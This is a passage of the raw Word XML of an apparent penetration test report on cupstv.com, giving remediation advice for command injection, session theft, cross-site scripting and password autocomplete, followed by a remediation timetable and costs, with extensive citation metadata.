        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002B1F54" w:rsidRPr="002B1F54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[27]</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED7B17">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:t xml:space="preserve"> The use of </w:t>
      </w:r>
      <w:r w:rsidR="000042DC" w:rsidRPr="00CA149E">
        <w:t>a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid</w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:t xml:space="preserve"> can also be very beneficial when attempting to stop Remote OS Command Injection </w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1118175247", "abstract" : "2nd ed. The highly successful security book returns with a new edition, completely updated Web applications are the front door to most organizations, exposing them to attacks that may disclose personal information, execute fraudulent transactions, or compromise ordinary users. This practical book has been completely updated and revised to discuss the latest step-by-step techniques for attacking and defending the range of ever-evolving web applications. You'll explore the various new technologies employed in web applications that have appeared since the first edition and review the new attack technique. Web application (in)security -- Core defense mechanisms -- Web application technologies -- Mapping the application -- Bypassing client-side controls -- Attacking authentication -- Attacking session management -- Attacking access controls -- Attacking data stores -- Attacking back-end components -- Attacking application logic -- Attacking users : Cross-site scripting -- Attacking users : Other techniques -- Automating customized attacks -- Exploiting information disclosure -- Attacking native compiled applications -- Attacking application architecture -- Attacking the application server -- Finding vulnerabilities in source code -- A web application hacker's toolkit -- A web application hacker's methodology.", "author" : [ { "dropping-particle" : "", "family" : "Stuttard", "given" : "Dafydd", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Pinto", "given" : "Marcus", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2011" ] ] }, "number-of-pages" : "912", "publisher" : "Wiley", "title" : "The web application hacker's handbook : finding and exploiting security flaws", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=eb8eb26d-15a0-34c2-ae8e-a59f38775556" ] } ], "mendeley" : { "formattedCitation" : "[28]", "plainTextFormattedCitation" : "[28]", "previouslyFormattedCitation" : "[28]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000042DC" w:rsidRPr="00CA149E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[28]</w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "9781118919873", "abstract" : "Web Application Hacker's Handbook 2e. There have been two broad trends that have evolved since the first edition and will be covered in detail in this edition: Various new and modified technologies have appeared that are being used in web applications, including new remoting frameworks, HTML5, cross-domain integration techniques. Many new attack techniques have been developed, particularly in relation to the client side, including UI redress (clickjacking), framebusting, HTTP parameter pollution, XML external entity injection, bypasses for new browser anti-XSS filters, hybrid file (GIFAR) atta. Web application hacker's handbook / Dafydd Stuttard, Marcus Pinto -- Malware analyst's cookbook and DVD / Michael Hale Ligh, Steven Adair, Blake Hartstein and Matthew Richard.", "author" : [ { "dropping-particle" : "", "family" : "Pinto", "given" : "Marcus.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Adair", "given" : "Steven.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Hartstein", "given" : "Blake.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Richard", "given" : "Matthew.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Hale Ligh", "given" : "Michael.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2014" ] ] }, "number-of-pages" : "1663", "publisher" : "Wiley", "title" : "Attack and Defend Computer Security Set.", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=6481e94e-7b98-3852-95d5-44239a48cdfd" ] } ], "mendeley" : { "formattedCitation" : "[29]", "plainTextFormattedCitation" : "[29]", "previouslyFormattedCitation" : "[29]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000042DC" w:rsidRPr="00CA149E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[29]</w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:t xml:space="preserve"> Another way to stop OS Command Injection is to keep as much</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54" w:rsidRPr="002B1F54">
        <w:t xml:space="preserve"> data that will be used to generate a command to be executed</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B1F54" w:rsidRPr="002B1F54">
        <w:t>out of external control as p</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:t>ossible</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54" w:rsidRPr="002B1F54">
        <w:t xml:space="preserve">. For example, in web applications, this may require storing the command locally in the session's state instead of sending it out to the client in a hidden form </w:t>
      </w:r>
      <w:r w:rsidR="00D77CC6" w:rsidRPr="002B1F54">
        <w:t>field.</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:t xml:space="preserve"> Similar to SQL Injection the use of a ‘whitelist’ can once again be implemented, this would mean all inputs are considered malicious unless they pass the ‘whitelist</w:t>
      </w:r>
      <w:r w:rsidR="00CA149E">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="00CA149E">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CA149E">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1449379214", "abstract" : "1st ed. Includes index. With the advent of rich Internet applications, the explosion of social media, and the increased use of powerful cloud computing infrastructures, a new generation of attackers has added cunning new techniques to its arsenal. For anyone involved in defending an application or a network of systems, Hacking: The Next Generation is one of the few books to identify a variety of emerging attack vectors. You'll not only find valuable information on new hacks that attempt to exploit technical flaws, you'll also learn how attackers take advantage of individuals via social networking sites, and abuse vul. Table of Contents; Preface; Audience; Assumptions This Book Makes; Contents of This Book; Conventions Used in This Book; Using Code Examples; We'd Like to Hear from You; Safari\u00ae Books Online; Acknowledgments; Chapter 1. Intelligence Gathering: Peering Through the Windows to Your Organization; Physical Security Engineering; Dumpster Diving; Hanging Out at the Corporate Campus; Google Earth; Social Engineering Call Centers; Search Engine Hacking; Google Hacking; Automating Google Hacking; Extracting Metadata from Online Documents; Searching for Source Code; Leveraging Social Networks.", "author" : [ { "dropping-particle" : "", "family" : "Dhanjani", "given" : "Nitesh.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Rios", "given" : "Billy.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Hardin", "given" : "Brett.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2009" ] ] }, "publisher" : "O'Reilly", "title" : "Hacking : the next generation", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=e3ef971f-f1c6-3231-9550-882523999969" ] } ], "mendeley" : { "formattedCitation" : "[30]", "plainTextFormattedCitation" : "[30]", "previouslyFormattedCitation" : "[30]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CA149E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CA149E" w:rsidRPr="00CA149E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[30]</w:t>
      </w:r>
      <w:r w:rsidR="00CA149E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CA149E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t xml:space="preserve"> Another method to stop this </w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:lastRenderedPageBreak/>
        <w:t>attack is to</w:t>
      </w:r>
      <w:r w:rsidR="00CA149E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:t>un</w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t xml:space="preserve"> OS</w:t>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:t xml:space="preserve"> code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system</w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Injection Prevention Cheat Sheet - OWASP", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=8ccf3e07-401c-3e6e-a26e-d4092fe83a7d" ] } ], "mendeley" : { "formattedCitation" : "[31]", "plainTextFormattedCitation" : "[31]", "previouslyFormattedCitation" : "[31]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[31]</w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CAC8AE" w14:textId="77777777" w:rsidR="00CA149E" w:rsidRDefault="00CA149E" w:rsidP="002B1F54"/>
    <w:p w14:paraId="328193C7" w14:textId="77777777" w:rsidR="00CA149E" w:rsidRDefault="00CA149E" w:rsidP="002B1F54">
      <w:r>
        <w:t xml:space="preserve">Once the two high-risk flaws have been resolved next would be the lesser flaws, the smaller flaws are typically simpler to patch. For the session stealing for example this can be resolved by ensuring that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HTTPOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flag is setup for all cookies, this one step can help stop any session stealing on cupstv.com</w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1118417054", "abstract" : "1. ed. Defending your web applications against hackers and attackers The top-selling book Web Application Hacker's Handbook showed how attackers and hackers identify and attack vulnerable live web applications. This new Web Application Defender's Cookbook is the perfect counterpoint to that book: it shows you how to defend. Authored by a highly credentialed defensive security expert, this new book details defensive security methods and can be used as courseware for training network security personnel, web server administrators, and security consultants. Each. Cover; Part I: Preparing the Battle Space; Chapter 1: Application Fortification; Recipe 1-1: Real-time Application Profiling; Recipe 1-2: Preventing Data Manipulation with Cryptographic Hash Tokens; Recipe 1-3: Installing the OWASP ModSecurity Core Rule Set (CRS); Recipe 1-4: Integrating Intrusion Detection System Signatures; Recipe 1-5: Using Bayesian Attack Payload Detection; HTTP Audit Logging; Recipe 1-6: Enable Full HTTP Audit Logging; Recipe 1-7: Logging Only Relevant Transactions; Recipe 1-9: Obscuring Sensitive Data in Logs. Recipe 1-10: Sending Alerts to a Central Log Host Using SyslogRecipe 1-11: Using the ModSecurity AuditConsole; Recipe 1-8: Ignoring Requests for Static Content; Chapter 2: Vulnerability Identification and Remediation; Internally Developed Applications; Externally Developed Applications; Virtual Patching; Recipe 2-1: Passive Vulnerability Identification; Active Vulnerability Identification; Recipe 2-2: Active Vulnerability Identification; Manual Vulnerability Remediation; Recipe 2-3: Manual Scan Result Conversion; Recipe 2-4: Automated Scan Result Conversion. Recipe 2-5: Real-time Resource Assessments and Virtual PatchingChapter 3: Poisoned Pawns (Hacker Traps); Honeytrap Concepts; Recipe 3-1: Adding Honeypot Ports; Recipe 3-2: Adding Fake robots.txt Disallow Entries; Recipe 3-3: Adding Fake HTML Comments; Recipe 3-4: Adding Fake Hidden Form Fields; Recipe 3-5: Adding Fake Cookies; Part II: Asymmetric Warfare; Chapter 4: Reputation and Third-Party Correlation; Suspicious Source Identification; Recipe 4-1: Analyzing the Client's Geographic Location Data; Recipe 4-2: Identifying Suspicious Open Proxy Usage. Recipe 4-3: Utilizing Real-time Blacklist Lookups (RBL)Recipe 4-4: Running Your Own RBL; Recipe 4-5: Detecting Malicious Links; Chapter 5: Request Data Analysis; Request Data Acquisition; Recipe 5-1: Request Body Access; Recipe 5-2: Identifying Malformed Request Bodies;\u2026", "author" : [ { "dropping-particle" : "", "family" : "Barnett", "given" : "Ryan C.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2013" ] ] }, "number-of-pages" : "522", "publisher" : "Wiley Pub., Inc", "title" : "Web Application Defender's Cookbook : Battling Hackers and Protecting Users.", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=622ae89e-3ca5-39c5-bc69-1d43dbe8cfa0" ] } ], "mendeley" : { "formattedCitation" : "[32]", "plainTextFormattedCitation" : "[32]", "previouslyFormattedCitation" : "[32]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001A4DB6" w:rsidRPr="001A4DB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[32]</w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1907117024", "abstract" : "May 2010 rev. \"May 2010 revision. First published in March 2010\"--Title page verso. \"ModSecurity Handbook is the definitive guide to ModSecurity, a popular open source web application firewall. Written by Ivan Ristic\u0301, who designed and wrote much of ModSecurity, this book will teach you everything you need to know to monitor the activity on your web sites and protect them from attack. ... The official ModSecurity Reference Manual is included in the second part of the book.\"--Page 4 of cover.", "author" : [ { "dropping-particle" : "", "family" : "Ristic", "given" : "Ivan.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2010" ] ] }, "number-of-pages" : "340", "publisher" : "Feisty Duck", "title" : "Modsecurity handbook", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=aae5b1d6-e3b0-3715-b99f-2557ac7e53fa" ] } ], "mendeley" : { "formattedCitation" : "[33]", "plainTextFormattedCitation" : "[33]", "previouslyFormattedCitation" : "[33]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001A4DB6" w:rsidRPr="001A4DB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[33]</w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. This is also a very similar resolution to stop cross site scripting,</w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t xml:space="preserve"> to help prevent cross site scripting all that is needed is to ensure that the web browser’s XSS filter is enabled, by setting the X-XSS-Protection HTTP response header to 1 this will help prevent cross site scripting</w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "178712097X", "abstract" : "Authors: Christopher Duffy [and six others]. Cf. Credits page.", "author" : [ { "dropping-particle" : "", "family" : "Duffy", "given" : "Christopher", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Python : penetration testing for developers : unleash the power of Python scripting to execute effective and efficient penetration tests : a course in three modules.", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=789bd6b5-dfd9-3211-bac4-522b524ca98d" ] }, { "id" : "ITEM-2", "itemData" : { "ISBN" : "1491936983", "abstract" : "First edition. Includes index.", "author" : [ { "dropping-particle" : "", "family" : "LeBlanc", "given" : "Jonathan", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Messerschmidt", "given" : "Tim", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-2", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Identity and data security for web development : best practices", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=51323352-6d43-3fd9-9ade-c8a2d2891f5e" ] } ], "mendeley" : { "formattedCitation" : "[34], [35]", "plainTextFormattedCitation" : "[34], [35]", "previouslyFormattedCitation" : "[34], [35]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001A4DB6" w:rsidRPr="001A4DB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[34], [35]</w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t>. The third and final low risk flaw which was the auto complete issue can also be easily resolved, this can be resolved by t</w:t>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:t>urn</w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:t xml:space="preserve"> off the AUTOCOMPLETE attribute in forms or individual input elements containing password inputs by using </w:t>
      </w:r>
      <w:r w:rsidR="000B751C">
        <w:t xml:space="preserve">the script </w:t>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:t>AUTOCOMPLETE='OFF'</w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0470952229", "abstract" : "Title from PDF title page (viewed Nov. 10, 2011). Includes index. Use the latest version of HTML to create dynamic Web pages HTML5 is the latest iteration of the standard markup language for creating Web pages. It boasts extensive updates from its predecessor and allows you to incorporate rich media content into a site without any dependence on extra software such as Flash. Packed with hundreds of screen shots, this visual guide introduces you to the many new features and abilities of HTML5 and shows you the many exciting new possibilities that exist for designing dynamic Web pages. Offers visual learners a solid reference on HTML5, the latest version of the. Cover; Table of Contents; Title Page; Chapter 1: Introducing HTML5; Chapter 2: Getting Started with HTML5 Page Layout; Chapter 3: Using New HTML5 User Interface Tags and Attributes; Chapter 4: Styling with CSS3; Chapter 5: Enhancing Your Web Page Visually with CSS3; Chapter 6: Creating Boxes and Columns with CSS3; Chapter 7: Creating HTML5 Form Inputs; Chapter 8: Using jQuery with HTML5; Chapter 9: Inspecting and Debugging Your Website; Chapter 10: Drawing with the HTML5 Canvas; Chapter 11: Adding HTML5 Multimedia; Chapter 12: Using Drag and Drop in HTML5.", "author" : [ { "dropping-particle" : "", "family" : "McDaniel", "given" : "Adam.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2012" ] ] }, "number-of-pages" : "372", "publisher" : "Wiley", "title" : "HTML5 : your Visual blueprint for designing rich web pages and applications", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=4fa001a1-5c4b-36d4-a146-238ef992fbb9" ] } ], "mendeley" : { "formattedCitation" : "[36]", "plainTextFormattedCitation" : "[36]", "previouslyFormattedCitation" : "[36]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001A4DB6" w:rsidRPr="001A4DB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[36]</w:t>
      </w:r>
      <w:r w:rsidR="001A4DB6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000B751C" w:rsidRPr="000B751C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F0798" w14:textId="77777777" w:rsidR="001A4DB6" w:rsidRDefault="001A4DB6" w:rsidP="002B1F54"/>
    <w:p w14:paraId="4BA324F0" w14:textId="77777777" w:rsidR="001A4DB6" w:rsidRPr="002B1F54" w:rsidRDefault="001A4DB6" w:rsidP="002B1F54">
      <w:r>
        <w:t xml:space="preserve">These changes can be implemented without the introduction of any new software or hardware, the only cost that will come from this penetration test is the charge to resolve these issues. The hourly rate for penetration testers can vary depending on the skill level, for </w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:t>the changes needed the rate will be £</w:t>
      </w:r>
      <w:r w:rsidR="006B753E">
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:t xml:space="preserve"> an hour. The time table that will be used can be seen in the next section, it will be the structure for the fixes to cupstv.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCCF968" w14:textId="77777777" w:rsidR="00ED7B17" w:rsidRPr="00E177C3" w:rsidRDefault="00ED7B17" w:rsidP="00E177C3"/>
    <w:p w14:paraId="6E88EC09" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc501124793"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>8.Timetable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="15D40CA2" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRPr="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="00D77CC6"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3127"/>
        <w:gridCol w:w="3172"/>
        <w:gridCol w:w="2717"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D77CC6" w14:paraId="7FE6A725" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02F563F8" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Ongoing Work</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B08CEA7" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Date (Each day will be considered a full 8 hour working day)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BECA0EE" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Cost (£</w:t>
            </w:r>
            <w:r w:rsidR="006B753E">
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:t>*8 per day</w:t>
            </w:r>
            <w:r w:rsidR="006B753E">
              <w:t>/ £240 per day</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="3BBB64BC" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EA72ABB" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Re-configure webserver to not trust user input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E1F1E2C" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>18/12/2017 – 19/12/2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD580D0" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£480</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77CC6" w14:paraId="1589DBE9" w14:textId="77777777" w:rsidTr="00D77CC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F144A7A" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>Re-configure webserver to use ASP.NET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3172" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6879FD6A" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="00D77CC6" w:rsidP="000042DC">
            <w:r>
              <w:t>20/12/2017 – 23/12/2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2717" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFBB635" w14:textId="77777777" w:rsidR="00D77CC6" w:rsidRDefault="006B753E" w:rsidP="000042DC">
            <w:r>
              <w:t>£960</w:t>
            </w:r>
          </w:p>
